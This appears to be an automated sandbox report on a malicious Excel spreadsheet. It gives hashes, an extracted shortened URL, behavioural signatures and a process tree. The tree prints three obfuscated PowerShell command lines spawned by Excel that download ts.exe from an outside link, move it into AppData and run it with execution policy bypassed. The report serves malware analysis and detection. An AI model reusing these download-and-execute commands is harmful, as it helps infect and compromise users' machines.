Analysis
- max time kernel: 148s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/06/2024, 09:57
Behavioral tasks
- behavioral1: sample 19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls, resource win7-20240221-en
- behavioral2: sample 19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls, resource win10v2004-20240611-en
General
- Target: 19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls
- Size: 116KB
- MD5: 19b5bbd4478a50df5b886c7c9168ec59
- SHA1: 9c84634a5685ebe2f75b2b3eecffc7c2748bd621
- SHA256: 7a89a04ff27d6fe5e0d9249feee09c24989b074aa75e5563f755a7a279c62e5e
- SHA512: 637d9a59ef4ce4145ac1ebc6c5bcfcf202b8c20d9a55c90ea4add7cd9f57832f9859201b1d1716138877c2e42d00b5c1413212cc0ac61c92273c036325e18539
- SSDEEP: 3072:ZTk3hbdlylKsgqopeJBWhZFGkE+cL2NdAoioo1gaSNAPZlsWFPO7YiR6PJEcjjas:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAos
Malware Config
- Extracted URL: https://bit.ly/3djeHvo
Signatures
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 5092 | 5084 | powershell.exe | 81
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4036 | 5084 | powershell.exe | 81
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1484 | 5084 | powershell.exe | 81
- Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  22 | 1484 | powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | Process
  5084 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  1484 | powershell.exe (2 hits)
  5092 | powershell.exe (2 hits)
  4036 | powershell.exe (2 hits)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1484 | powershell.exe
  Token: SeDebugPrivilege | 5092 | powershell.exe
  Token: SeDebugPrivilege | 4036 | powershell.exe
- Suspicious use of SetWindowsHookEx (14 IoCs)
  pid | Process
  5084 | EXCEL.EXE (14 hits)
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 5084 wrote to memory of 1484 | 5084 | EXCEL.EXE | 86 (2 hits)
  PID 5084 wrote to memory of 4036 | 5084 | EXCEL.EXE | 87 (2 hits)
  PID 5084 wrote to memory of 5092 | 5084 | EXCEL.EXE | 88 (2 hits)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 5084, depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1484, depth 2)
    Command line: powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://bit.ly/3djeHvo','ts.exe')
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4036, depth 2)
    Command line: powershell -w 1 Start-Sleep 20; Move-Item "ts.exe" -Destination "${enV`:appdata}"
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5092, depth 2)
    Command line: powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/ts.exe')
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (6KB, listed three times)
- Four further files without a recorded path (2KB, 1KB, 1KB, 60B)